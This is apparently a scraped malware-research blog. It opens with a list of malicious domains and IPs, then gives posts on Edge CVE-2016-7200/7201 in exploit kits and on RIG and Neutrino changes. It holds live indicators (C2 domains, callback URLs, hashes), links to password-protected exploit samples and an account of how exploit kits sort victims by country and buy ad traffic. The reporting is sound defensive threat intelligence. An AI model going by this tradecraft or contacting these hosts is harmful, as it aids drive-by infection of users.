27rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/27reindeerprofit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27reminderdonna.divingfuelsalary.trade93.190.141.200Nebula2017/02/27startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27supplyheaven.gramsunshinesupply.club93.190.141.39Nebula2017/02/27transportbomb.gramsunshinesupply.club93.190.141.39Nebula2017/02/28afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/28agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/02/28bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28certificationplanet.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28chooseravioli.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28coachadvantage.reportattackconifer.site93.190.141.39Nebula2017/02/28databasesilver.reportattackconifer.site93.190.141.39Nebula2017/02/28date-of-birthtrout.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28dependentswhorl.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28derpenquiry.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28domainconsider.mxkznekruoays.trade93.190.141.200Nebula2017/03/01agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/03/01bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02actressheight.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02applywholesaler.tboapfmsyu.stream93.190.141.200Nebula2017/03/02approvepeak.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02borrowfield.77e1084e.pro93.190.141.45Nebula2017/03/02boydescription.356020817786fb76e9361441800132c9.win93.190.141.39Nebula2017/03/02buglecommand.textfatherfont.info93.190.141.39Nebula2017/03/02buysummer.77e1084e.pro93.190.141.45Nebula2017/03/02captaincertification.77e1084e.pro93.190.141.45Nebula2017/03/02chargerule.textfatherfont.info93.190.141.39Nebula2017/03/02cityacoustic.textfatherfont.info93.190.141.39Nebula2017/03/02clickbarber.356020817786fb76e9361441800132c9.win93.190.141.39NebulaCVE-2016-7200 & CVE-2016-7201 (Edge) and Exploit Kits2017-01-06T14:15:00+01:002017-01-06T14:15:00+01:00https://malware.dontneedcoffee.com/2017/01/CVE-2016-7200-7201<div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-3_AhKRZc5CE/WG-SICi5DkI/AAAAAAAAGDs/w1O3ghHmEkU42qBoT0D9kPetn0mEAlt2ACLcB/s1600/2017-01-06_12h44_11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-3_AhKRZc5CE/WG-SICi5DkI/AAAAAAAAGDs/w1O3ghHmEkU42qBoT0D9kPetn0mEAlt2ACLcB/s1600/2017-01-06_12h44_11.png" /></a></div><br /><br /><br />CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by <a href="https://twitter.com/natashenka">Natalie Silvanovich</a> of <a href="https://googleprojectzero.blogspot.co.uk/">Google Project Zero</a>, those have been fixed in <a href="https://technet.microsoft.com/library/security/ms16-129">november 2016 (MS16-129)</a> by Microsoft.<br /><br />Note : No successful exploitation seen despite integration tries.<br /><br />On 2017-01-04 @theori_io released a POC<br /><blockquote class="twitter-tweet" data-lang="fr"><div dir="ltr" lang="en">Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —<a href="https://t.co/DnwQt5giMB">https://t.co/DnwQt5giMB</a></div>— Theori (@theori_io) <a href="https://twitter.com/theori_io/status/816794384498733056">4 janvier 2017</a></blockquote><script async="" charset="utf-8" src="//platform.twitter.com/widgets.js"></script><br />providing again (cf <a href="http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a>) ready-to-use code to Exploit Kit maintainer.<br /><br />After not far from 6 months without new exploit integrated in an EK ecosystem which has <a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">lost its innovation locomotive (Angler)</a> , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.<br /><br />The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.<br /><br />[edit : 2017-01-10]<br />I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.<br />[/edit]<br /><div><br /><b><u>Sundown:</u></b><br />2017-01-06<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-J7wl0kb-oSE/WG-SUEIQ9sI/AAAAAAAAGDw/fNEesZkBh0YN7iJiiGtFpu3lNXils4lvACLcB/s1600/2017-01-06_12h29_07.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://2.bp.blogspot.com/-J7wl0kb-oSE/WG-SUEIQ9sI/AAAAAAAAGDw/fNEesZkBh0YN7iJiiGtFpu3lNXils4lvACLcB/s640/2017-01-06_12h29_07.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06<br />No exploitation here though</td></tr></tbody></table><u>Fiddler:</u> <span style="font-size: x-small;"><a href="https://files.dontneedcoffee.com/index.php/s/Ewj61yyxxJW9gEn">Sundown_Edge__CVE-2016-7201_170106.zip</a> </span>(<i><span style="font-size: x-small;">password is malware</span></i>)<br /><br />Out of topic: <i><span style="font-size: x-small;">expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)</span></i><br /><br /><b><u>Neutrino:</u></b><br />2017-01-14<br />--<br />Thanks to <a href="http://www.trendmicro.com/">Trendmicro</a> for the multiple inputs that allowed me to keep plugged to this infection chain.<br />--<br />So as explained <a href="http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html">previously</a> Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies <span style="font-size: x-small;">(e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds)</span> by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.<br />Without big surprise a new exploit is included in the Flash bundle : nw27 > CVE-2016-7200/7201.<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-Fhyu8dUjScs/WHo7xB6i9OI/AAAAAAAAGEg/nRZq15-og1ApKHeSO4XTeKRXNG8IKp03ACLcB/s1600/2017-01-14_14h53_14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="164" src="https://4.bp.blogspot.com/-Fhyu8dUjScs/WHo7xB6i9OI/AAAAAAAAGEg/nRZq15-og1ApKHeSO4XTeKRXNG8IKp03ACLcB/s640/2017-01-14_14h53_14.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">NeutrAds redirect is now accepting Edge traffic - 2017-01-14</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-6Co41dG-1VU/WHyLHINy_YI/AAAAAAAAGFY/f09CAex58YYRELgUxGFLydhQ2BTBwu3tQCLcB/s1600/2017-01-14_14h16_34.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="208" src="https://1.bp.blogspot.com/-6Co41dG-1VU/WHyLHINy_YI/AAAAAAAAGFY/f09CAex58YYRELgUxGFLydhQ2BTBwu3tQCLcB/s640/2017-01-14_14h16_34.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><div style="font-size: 12.8px;">Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14</div><div style="font-size: 12.8px;">(Neutrino-v flash ran into <a href="https://twitter.com/maciekkotowicz">Maciej</a> ‘s <a href="https://github.com/mak/ekdeco/tree/master/neutrino">Neutrino decoder</a> )</div></td></tr></tbody></table><br /><br /><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-Sm_0IE203Ko/WHpJopyUF_I/AAAAAAAAGFI/OoQvFYRN3aAjLf0z5IXeykLgSi40IQwNgCLcB/s1600/2017-01-14_13h51_15.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://4.bp.blogspot.com/-Sm_0IE203Ko/WHpJopyUF_I/AAAAAAAAGFI/OoQvFYRN3aAjLf0z5IXeykLgSi40IQwNgCLcB/s640/2017-01-14_13h51_15.png" width="422" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Extracted CVE-2016-7200/7201 elements - 2017-01-14</td></tr></tbody></table><br /><br />Note: i did not get infection with<br />- Edge 25.10586.0.0 / EdgeHTML 13.10586<br />- Edge 20.10240.16384.0<br /><div><br /></div><b><u>Fiddler&Pcap :</u></b> <a href="https://files.dontneedcoffee.com/index.php/s/8s6bL8WfMkkaA62">Neutrino-v_CVE-2016-72007201_170114.zip</a> (<span style="font-size: x-small;">Password is malware</span>)<br /><b><u>Extracted exploits:</u></b> <a href="https://files.dontneedcoffee.com/index.php/s/EBJtx8azNg2zpEM">Neutrino_2017-01-14.zip</a> (<span style="font-size: x-small;">Password is malware</span>)<br /><br /><span data-sheets-userformat="{"2":2112257,"3":{"1":0},"11":0,"12":0,"14":{"1":2,"2":0},"15":"Arial","16":10,"24":{"1":0,"2":3,"3":0,"4":3}}" data-sheets-value="{"1":2,"2":"chicnsexy.com|51.15.44.191\nreveiled.space|45.32.113.97"}" style="font-family: "arial";"><span style="font-size: x-small;">reveiled[.space|45.32.113.97 - NeutrAds Filtering Redirector</span></span><br /><span data-sheets-userformat="{"2":2112257,"3":{"1":0},"11":0,"12":0,"14":{"1":2,"2":0},"15":"Arial","16":10,"24":{"1":0,"2":3,"3":0,"4":3}}" data-sheets-value="{"1":2,"2":"chicnsexy.com|51.15.44.191\nreveiled.space|45.32.113.97"}" style="font-family: "arial";"><span style="font-size: x-small;">vfwdgpx.amentionq[.win|149.56.115.166 - Neutrino</span></span><br /><br /><span style="font-size: x-small;"><i> Payload in that pass : Gootkit - <a href="https://www.virustotal.com/file/b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610/analysis/1484406208/">b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610</a><br />Associated C2 :<br />buyyou[.org | 204.44.118.228<br />felixesedit[.com<br />fastfuriedts[.org <br />monobrosexeld[.org</i></span></div><div><span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "arial" , sans-serif; font-size: 12px;"><br /></span><br />So those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get Gootkit<style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}--></style><br /><div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-DqLu3ck8RKA/WHpASNm4nyI/AAAAAAAAGE0/MqJGuVNUOM88pRpQY_GuYdutaVuCvMRRgCLcB/s1600/2017-01-14_15h07_08.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="370" src="https://4.bp.blogspot.com/-DqLu3ck8RKA/WHpASNm4nyI/AAAAAAAAGE0/MqJGuVNUOM88pRpQY_GuYdutaVuCvMRRgCLcB/s640/2017-01-14_15h07_08.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"><a href="https://github.com/MISP/MISP" style="font-size: 12.8px;">MISP</a><span style="font-size: 12.8px;"> : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)</span></td></tr></tbody></table><b><u>Kaixin:</u></b><br />2017-01-15 Finding by <a href="https://twitter.com/issuemakerslab">Simon Choi</a><br /><b><u><br /></u></b><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-doWnD1Blz1M/WHyNGDYK4jI/AAAAAAAAGFk/1219v3UOVRk-2HbatHax19bPAvkloeFCwCLcB/s1600/2017-01-16_09h00_33.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="340" src="https://1.bp.blogspot.com/-doWnD1Blz1M/WHyNGDYK4jI/AAAAAAAAGFk/1219v3UOVRk-2HbatHax19bPAvkloeFCwCLcB/s640/2017-01-16_09h00_33.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">CVE-2016-7200/7201 code fired by Kaixin - 2017-01-16</td></tr></tbody></table><b style="text-decoration-line: underline;">Fiddler :</b> <a href="https://files.dontneedcoffee.com/index.php/s/nBdVpsg9CUfURpH">Kaixin_2017-01-16.zip</a> (<span style="font-size: x-small;">Password is malware</span>)<br /><br /><i><span style="font-size: x-small;">Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra <span style="background-color: white; color: #333333; font-family: "helvetica neue" , "helvetica" , "arial" , sans-serif;"><a href="https://www.virustotal.com/file/6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332/analysis/1484557084/">6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332</a></span></span></i><br /><i><span style="font-size: x-small;">Callback:</span></i><br /><i><span style="font-size: x-small;">http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195</span></i><br /><br /><i><span style="font-size: x-small;">http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437</span></i><br /><b><u><br /></u></b><b><u>Edits:</u></b><br />2016-11-10 - Adding information about mitigation on Edge<br />2016-11-14 - Adding Neutrino<br />2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not<br />2016-11-16 - Adding Kaixin<br /><br /><b style="text-decoration-line: underline;">Read More:</b><br /><a href="http://blogs.360.cn/360safe/2016/11/29/three-roads-lead-to-rome-2/">Three roads lead to Rome</a> - Qihoo360 - 2016-11-29<br /><a href="https://github.com/theori-io/chakra-2016-11">Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201)</a> - Theori-io - 2017-01-04</div><style type="text/css"><!--td {border: 1px solid #ccc;}br {mso-data-placement:same-cell;}--></style>Kafeinehttps://twitter.com/kafeineCVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed in november 2016 (MS16-129) by Microsoft.Note : No successful exploitation seen despite integration tries.On 2017-01-04 @theori_io released a POCProof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://t.co/DnwQt5giMB— Theori (@theori_io) 4 janvier 2017providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.[edit : 2017-01-10]I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.[/edit]Sundown:2017-01-06Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06No exploitation here thoughFiddler: Sundown_Edge__CVE-2016-7201_170106.zip (password is malware)Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)Neutrino:2017-01-14--Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.--So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.Without big surprise a new exploit is included in the Flash bundle : nw27 > CVE-2016-7200/7201.NeutrAds redirect is now accepting Edge traffic - 2017-01-14Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )Extracted CVE-2016-7200/7201 elements - 2017-01-14Note: i did not get infection with- Edge 25.10586.0.0 / EdgeHTML 13.10586- Edge 20.10240.16384.0Fiddler&Pcap : Neutrino-v_CVE-2016-72007201_170114.zip (Password is malware)Extracted exploits: Neutrino_2017-01-14.zip (Password is malware)reveiled[.space|45.32.113.97 - NeutrAds Filtering Redirectorvfwdgpx.amentionq[.win|149.56.115.166 - Neutrino Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610Associated C2 :buyyou[.org | 204.44.118.228felixesedit[.comfastfuriedts[.org monobrosexeld[.orgSo those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get GootkitMISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)Kaixin:2017-01-15 Finding by Simon ChoiCVE-2016-7200/7201 code fired by Kaixin - 2017-01-16Fiddler : Kaixin_2017-01-16.zip (Password is malware)Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332Callback:http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437Edits:2016-11-10 - Adding information about mitigation on Edge2016-11-14 - Adding Neutrino2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not2016-11-16 - Adding KaixinRead More:Three roads lead to Rome - Qihoo360 - 2016-11-29Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04RIG evolves, Neutrino waves goodbye, Empire Pack appears2016-10-02T05:57:00+02:002016-10-02T05:57:00+02:00https://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye<h1 id="rig-evolves-empire-pack-shows-up-neutrino-waves-goodbye" style="text-align: center;"> <a href="https://1.bp.blogspot.com/-1dBt5uHTNTA/V_B-M2l3kSI/AAAAAAAAGBo/fBecgh3ZBRY6HNivmK-QkPbT6Gq15ys1ACK4B/s1600/images-1.jpg" imageanchor="1" style="text-align: center;"><img alt="Neutrino waves Goodbye" height="120" src="https://1.bp.blogspot.com/-1dBt5uHTNTA/V_B-M2l3kSI/AAAAAAAAGBo/fBecgh3ZBRY6HNivmK-QkPbT6Gq15ys1ACK4B/s1600/images-1.jpg" width="200" /></a></h1><br />Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (<em>CryptMic</em>) Ransomware.<br /><br /><br /><a href="https://4.bp.blogspot.com/-Ahvf5iJP-hw/V91mgqFmCvI/AAAAAAAAF6k/7fN9JObH-rA95OiYAq8BcHwtFJbLK-fugCK4B/s1600/2016-09-17_16h42_23.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-Ahvf5iJP-hw/V91mgqFmCvI/AAAAAAAAF6k/7fN9JObH-rA95OiYAq8BcHwtFJbLK-fugCK4B/s1600/2016-09-17_16h42_23.png" title="" /></a> <br /><em>Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016</em><br /><h3 id="rig-internal-tds"><strong>RIG += internal TDS :</strong></h3>Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]<br />I believe this feature appeared in the EK market with Blackhole <em>(if you are aware of a TDS integrated earlier directly in an EK please tell me)</em><br /><a href="https://1.bp.blogspot.com/-C2oQyXLEM-c/V91obFENiUI/AAAAAAAAF60/h5QrZMWP028zx__6wFqam-pRFeWj6U7XgCK4B/s1600/screenshot_727.png" imageanchor="1"><img alt="" src="https://1.bp.blogspot.com/-C2oQyXLEM-c/V91obFENiUI/AAAAAAAAF60/h5QrZMWP028zx__6wFqam-pRFeWj6U7XgCK4B/s1600/screenshot_727.png" title="" /> </a><br /><em>Picture2: Blackhole - 2012 - Internal TDS illustration</em><br /><em><br /></em>but disappeared from the market with the end of Nuclear Pack <br /><a href="https://4.bp.blogspot.com/-AXcZdWNBr0U/V91oqgXWcKI/AAAAAAAAF68/i39KV_O4_KMRSTnF8oaAtRZ6kenr1AvZACK4B/s1600/Untitled%2Bpicture.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-AXcZdWNBr0U/V91oqgXWcKI/AAAAAAAAF68/i39KV_O4_KMRSTnF8oaAtRZ6kenr1AvZACK4B/s1600/Untitled%2Bpicture.png" title="" /> </a><br /><em>Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustration</em><br /><em><br /></em>and <a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">Angler EK</a> <br /><a href="https://2.bp.blogspot.com/-CnvhUracaVw/V91o0dmtXhI/AAAAAAAAF7E/tyeeSuW2T5EwOMUmiv4Tz6H41Cb3G4DzQCK4B/s1600/2016-09-17_16h13_20.png" imageanchor="1"><img alt="" src="https://2.bp.blogspot.com/-CnvhUracaVw/V91o0dmtXhI/AAAAAAAAF7E/tyeeSuW2T5EwOMUmiv4Tz6H41Cb3G4DzQCK4B/s1600/2016-09-17_16h13_20.png" title="" /></a> <br /><em>Picture 4 : Angler EK - Internal TDS illustration</em><br /><em><br /></em>This is a key feature for load seller. It is making their day to day work with traffic provider far easier . <br />It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.<br /><br />Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS <em>(like <a href="https://keitarotds.com/">Keitaro</a>/<a href="http://kytoon.com/sutra-tds.html">Sutra</a>/<a href="http://malware.dontneedcoffee.com/2014/04/meet-blackhat-tds.html">BlackHat TDS</a>/SimpleTDS/BossTDS, etc…)</em> and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country).<br /><a href="https://2.bp.blogspot.com/-S4yWsSsWO_k/UL56F95M7kI/AAAAAAAADQk/wD9bkVfX_6o/s1600/screenshot_39.png" imageanchor="1"><img alt="" src="https://2.bp.blogspot.com/-S4yWsSsWO_k/UL56F95M7kI/AAAAAAAADQk/wD9bkVfX_6o/s1600/screenshot_39.png" title="" /> </a><br /><em>Picture 5: A Sutra TDS in action in 2012 - cf <a href="http://malware.dontneedcoffee.com/2012/12/eyeglanceru.html">The path to infection</a> </em><br /><h3 id="rig-rc4-encryption-dll-drop-and-cve-2016-0189"><strong>RIG += RC4 encryption, dll drop and <a href="http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a>:</strong></h3>Around 2016-09-12 a variation of RIG <em>(which i flag as RIG-v in my systems)</em> appeared.<br />A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added <a href="http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a><br /><a href="https://2.bp.blogspot.com/-QpywyAcDFUc/V91sRLHepcI/AAAAAAAAF7c/EdkJn0UxdyAb5CA_Gy4q-rBTX6UBRAKKgCK4B/s640/2016-09-16_11h13_14.png" imageanchor="1"><img alt="" height="89" src="https://2.bp.blogspot.com/-QpywyAcDFUc/V91sRLHepcI/AAAAAAAAF7c/EdkJn0UxdyAb5CA_Gy4q-rBTX6UBRAKKgCK4B/s640/2016-09-16_11h13_14.png" title="" width="640" /></a> <br /><em>Picture 6: RIG-v Neutrino-ish behavioral captured by <a href="https://github.com/spender-sandbox/cuckoo-modified">Brad Spengler’s modified cuckoo</a></em><br /><a href="https://2.bp.blogspot.com/-tiPWHywyJ7c/V92Dxp48eFI/AAAAAAAAF8E/CbVqakdPLlcruFg1km_YP_3uin6hGK2wACK4B/s1600/2016-09-17_18h43_36.png" imageanchor="1"><img alt="" src="https://2.bp.blogspot.com/-tiPWHywyJ7c/V92Dxp48eFI/AAAAAAAAF8E/CbVqakdPLlcruFg1km_YP_3uin6hGK2wACK4B/s1600/2016-09-17_18h43_36.png" title="" /></a> <br /><em>Picture 7: <a href="http://malware.dontneedcoffee.com/2016/07/cve-2016-0189-internet-explorer-and.html">CVE-2016-0189</a> from RIG-v after 3 step de-obfuscation pass.</em><br /><h3 id="neutrino-waves-goodbye"><strong>Neutrino waves goodbye ?</strong></h3>On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :<br /><blockquote class="tr_bq"><blockquote class="tr_bq"><span style="color: #20124d;"><b>“we are closed. no new rents, no extends more”</b></span></blockquote></blockquote>This explains a lot. Here are some of my last Neutrino pass for past month. <br /><div style="text-align: center;"><div style="text-align: left;"><a href="https://3.bp.blogspot.com/-q9AZpPvGeYI/V_BLjRJ_5qI/AAAAAAAAF_c/zbeMTdYYUpMgDaX_40rXTsgHfL7A-6aegCK4B/s1600/2016-10-02_00h46_07.png" imageanchor="1"><img alt="" src="https://3.bp.blogspot.com/-q9AZpPvGeYI/V_BLjRJ_5qI/AAAAAAAAF_c/zbeMTdYYUpMgDaX_40rXTsgHfL7A-6aegCK4B/s1600/2016-10-02_00h46_07.png" title="" /></a> </div></div><em>Picture 8: Some Neutrino passes for past month and associated taxonomy tags in <a href="https://github.com/MISP/MISP">Misp</a></em><br /><br />As you can see several actors were still using it…Now here is what i get for the past days :<br /><div style="text-align: center;"><div style="text-align: left;"><a href="https://2.bp.blogspot.com/-k7bKCV1TEBk/V_BdQJTD2KI/AAAAAAAAGAs/MPOuBv-H_rEInkuFXOkmY6BPsCQ0Tgd7gCK4B/s1600/2016-10-02_00h37_02.png" imageanchor="1"><img alt="" src="https://2.bp.blogspot.com/-k7bKCV1TEBk/V_BdQJTD2KI/AAAAAAAAGAs/MPOuBv-H_rEInkuFXOkmY6BPsCQ0Tgd7gCK4B/s1600/2016-10-02_00h37_02.png" title="" /> </a></div></div><em>Picture 9: Past days in DriveBy land</em> <br /><em>Not shown here, Magnitude is still around, mostly striking in Asia</em><br /><em><br /></em>Day after day, <strong>each of them</strong> transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground.<br /><br /><img alt="" src="https://2.bp.blogspot.com/-Ami_WuKqi8A/V_B7htEJw2I/AAAAAAAAGBc/KUQLwkWd6gA74SIhxOQLZbttPerXMBdOACK4B/s1600/neutrino.gif" title="" /> <br /><em>Picture 10: Last banner for Neutrino as of 2016-09-16</em><br /><em><br /></em>Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.<br /><blockquote>Side reminder : Neutrino disappeared from march 2014 till november 2014</blockquote><h3 id="a-neutrino-variant">A Neutrino Variant</h3>Several weeks ago, <a href="http://blog.trendmicro.com/">Trendmicro</a> (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. <br /><a href="https://4.bp.blogspot.com/-JiKo9kECTcU/V_BR7XToIeI/AAAAAAAAF_8/Cdk4rGiCAc4YaRuDjhNKyRsPeSPb_YR_wCK4B/s1600/2016-10-02_01h15_13.png" imageanchor="1"><img alt="" height="89" src="https://4.bp.blogspot.com/-JiKo9kECTcU/V_BR7XToIeI/AAAAAAAAF_8/Cdk4rGiCAc4YaRuDjhNKyRsPeSPb_YR_wCK4B/s640/2016-10-02_01h15_13.png" title="" width="640" /></a> <br /><em>Picture 11: Neutrino-v pass on the 2016-09-21</em><br /><i><br /></i>Upon replay I noticed that this Neutrino was somewhat different. Smoother <a href="http://malware.dontneedcoffee.com/2016/05/cve-2016-4117-flash-up-to-2100213-and.html">CVE-2016-4117</a>, more randomization in the landing, slightly modified flash bundle of exploits<br /><a href="https://4.bp.blogspot.com/-usY9BIfyYls/V_BUYlQ7e3I/AAAAAAAAGAI/Rs6sclwDDhY5TcVgX_hdhaKy0kIFRIPEwCK4B/s1600/2016-10-02_01h20_52.png" imageanchor="1"><img alt="" src="https://4.bp.blogspot.com/-usY9BIfyYls/V_BUYlQ7e3I/AAAAAAAAGAI/Rs6sclwDDhY5TcVgX_hdhaKy0kIFRIPEwCK4B/s1600/2016-10-02_01h20_52.png" title="" /></a> <br /><em>Picture 